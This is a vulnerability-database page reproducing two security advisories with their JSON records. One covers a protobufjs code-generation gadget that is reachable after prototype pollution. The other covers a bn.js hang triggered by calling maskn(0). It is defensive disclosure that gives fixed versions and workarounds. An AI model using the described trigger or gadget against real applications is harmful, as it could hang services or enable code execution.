GHSA-75PX-5XX7-5XC7
Vulnerability from github – Published: 2026-05-12 15:01 – Updated: 2026-05-14 20:35Summary
protobufjs used plain objects with inherited prototypes for internal type lookup tables used by generated encode and decode functions. If Object.prototype had already been polluted, those lookup tables could resolve attacker-controlled inherited properties as valid protobuf type information.
This could cause attacker-controlled strings to be emitted into generated JavaScript code.
Impact
An attacker who can first trigger a prototype pollution vulnerability may be able to influence generated protobufjs encode or decode functions in a way that can lead to arbitrary JavaScript execution.
This issue requires a separate prototype pollution primitive before protobufjs is invoked.
Applications without a reachable prototype pollution primitive are not directly exploitable through this issue alone.
Preconditions
- The application or one of its dependencies must allow an attacker to pollute
Object.prototype. - The polluted property must affect protobufjs internal type lookup behavior.
- The application must use protobufjs functionality that generates encode or decode code for affected types.
- The generated code path must be reached after the prototype pollution has occurred.
Workarounds
Avoid running affected versions in applications where attacker-controlled input can pollute Object.prototype. If immediate upgrade is not possible, remove or mitigate reachable prototype pollution primitives and isolate schema/message processing from untrusted application state.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.5.5"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.1"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44291"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:01:24Z",
"nvd_published_at": "2026-05-13T16:16:55Z",
"severity": "HIGH"
},
"details": "## Summary\n\nprotobufjs used plain objects with inherited prototypes for internal type lookup tables used by generated encode and decode functions. If `Object.prototype` had already been polluted, those lookup tables could resolve attacker-controlled inherited properties as valid protobuf type information.\n\nThis could cause attacker-controlled strings to be emitted into generated JavaScript code.\n\n## Impact\n\nAn attacker who can first trigger a prototype pollution vulnerability may be able to influence generated protobufjs encode or decode functions in a way that can lead to arbitrary JavaScript execution.\n\nThis issue requires a separate prototype pollution primitive before protobufjs is invoked.\n\nApplications without a reachable prototype pollution primitive are not directly exploitable through this issue alone.\n\n## Preconditions\n\n- The application or one of its dependencies must allow an attacker to pollute `Object.prototype`.\n- The polluted property must affect protobufjs internal type lookup behavior.\n- The application must use protobufjs functionality that generates encode or decode code for affected types.\n- The generated code path must be reached after the prototype pollution has occurred.\n\n## Workarounds\n\nAvoid running affected versions in applications where attacker-controlled input can pollute `Object.prototype`. If immediate upgrade is not possible, remove or mitigate reachable prototype pollution primitives and isolate schema/message processing from untrusted application state.",
"id": "GHSA-75px-5xx7-5xc7",
"modified": "2026-05-14T20:35:15Z",
"published": "2026-05-12T15:01:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-75px-5xx7-5xc7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44291"
},
{
"type": "PACKAGE",
"url": "https://github.com/protobufjs/protobuf.js"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.6"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "protobuf.js: Code generation gadget after prototype pollution"
}
GHSA-378V-28HJ-76WF
Vulnerability from github – Published: 2026-02-20 06:30 – Updated: 2026-02-24 14:45This affects versions of the package bn.js before 4.12.3 and 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "bn.js"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.12.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "bn.js"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-2739"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-20T21:18:31Z",
"nvd_published_at": "2026-02-20T05:17:53Z",
"severity": "MODERATE"
},
"details": "This affects versions of the package bn.js before 4.12.3 and 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.",
"id": "GHSA-378v-28hj-76wf",
"modified": "2026-02-24T14:45:53Z",
"published": "2026-02-20T06:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739"
},
{
"type": "WEB",
"url": "https://github.com/indutny/bn.js/issues/186"
},
{
"type": "WEB",
"url": "https://github.com/indutny/bn.js/issues/316"
},
{
"type": "WEB",
"url": "https://github.com/indutny/bn.js/issues/316#issuecomment-3924217358"
},
{
"type": "WEB",
"url": "https://github.com/indutny/bn.js/pull/317"
},
{
"type": "WEB",
"url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b"
},
{
"type": "WEB",
"url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91"
},
{
"type": "PACKAGE",
"url": "https://github.com/indutny/bn.js"
},
{
"type": "WEB",
"url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "bn.js affected by an infinite loop"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.